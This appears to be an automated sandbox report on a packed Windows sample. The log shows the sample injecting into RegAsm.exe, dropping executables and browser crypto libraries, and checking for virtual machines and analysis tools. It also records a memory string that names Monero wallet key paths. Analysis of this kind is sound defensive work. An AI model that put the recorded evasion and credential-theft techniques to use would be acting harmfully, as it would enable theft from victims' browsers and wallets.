Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: freebl3.pdb source: RegAsm.exe, 00000003.00000002.2402065082.00000000206CF000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.2412916787.0000000026633000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
Source:	Binary string: freebl3.pdbp source: RegAsm.exe, 00000003.00000002.2402065082.00000000206CF000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.2444731467.000000006C24F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2427231570.000000003E3F6000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr
Source:	Binary string: c:\rje\tg\87o1b\obj\Release\ojc.pdb source: file.exe
Source:	Binary string: c:\rje\tg\obj\Release\ojc.pdb source: vdshfd[1].exe.3.dr, KJEHJKJEBG.exe.3.dr
Source:	Binary string: c:\rje\tg\12rr6\obj\Release\ojc.pdb source: CBFBKFIDHI.exe.3.dr, ljhgfsd[1].exe.3.dr
Source:	Binary string: softokn3.pdb@ source: RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000003.00000002.2423960820.0000000038485000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000003.00000002.2417117935.000000002C5A7000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.2444731467.000000006C24F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2427231570.000000003E3F6000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.2412916787.0000000026633000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.2393955360.000000001A2FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2401373713.0000000020268000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2716057480.00000000203EB000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

3_2_00418950

Source: nss3.dll.3.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.3.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.3.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.3.dr	Static PE information: section name: .didat
Source: softokn3.dll.3.dr	Static PE information: section name: .00cfg

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042F142 push ecx; ret	3_2_0042F155
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00422D3B push esi; ret	3_2_00422D3D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041DDB5 push ecx; ret	3_2_0041DDC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00432715 push 0000004Ch; iretd	3_2_00432726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C04B536 push ecx; ret	3_2_6C04B549
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00438B7E push cs; iretd	9_2_00438B85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_2039F456 push ebx; ret	13_2_2039F457
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_2038D561 push esp; retf	13_2_2038D570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_2038DB66 push esp; retf	13_2_2038DB67
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_20323C51 push es; retf	13_2_20323C57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_20354BF0 push ecx; ret	13_2_20354C03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_2035A45D push esi; ret	13_2_2035A45F

Source: file.exe	Static PE information: section name: .text entropy: 7.995740381906031
Source: CBFBKFIDHI.exe.3.dr	Static PE information: section name: .text entropy: 7.995225395636529
Source: ljhgfsd[1].exe.3.dr	Static PE information: section name: .text entropy: 7.995225395636529
Source: KJEHJKJEBG.exe.3.dr	Static PE information: section name: .text entropy: 7.99542204298472
Source: vdshfd[1].exe.3.dr	Static PE information: section name: .text entropy: 7.99542204298472

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vdshfd[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KJEHJKJEBG.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\CBFBKFIDHI.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\ljhgfsd[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KJEHJKJEBG.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\CBFBKFIDHI.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_00418950

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3725570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3725570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1680508466.0000000003725000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7476, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: RegAsm.exe	Binary or memory string: DIR_WATCH.DLL
Source: RegAsm.exe, 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
Source: RegAsm.exe	Binary or memory string: SBIEDLL.DLL
Source: RegAsm.exe	Binary or memory string: API_LOG.DLL

Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2720000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2530000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Memory allocated: 1540000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Memory allocated: 30B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Memory allocated: 3000000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Memory allocated: 1150000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Memory allocated: 2B30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Memory allocated: 4B30000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened / queried: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\ljhgfsd[1].exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,

3_2_0040180D

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe TID: 7464	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe TID: 8132	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8156	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe TID: 7200	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 3808	Thread sleep count: 79 > 30

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh

3_2_00410DDB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_0041543D
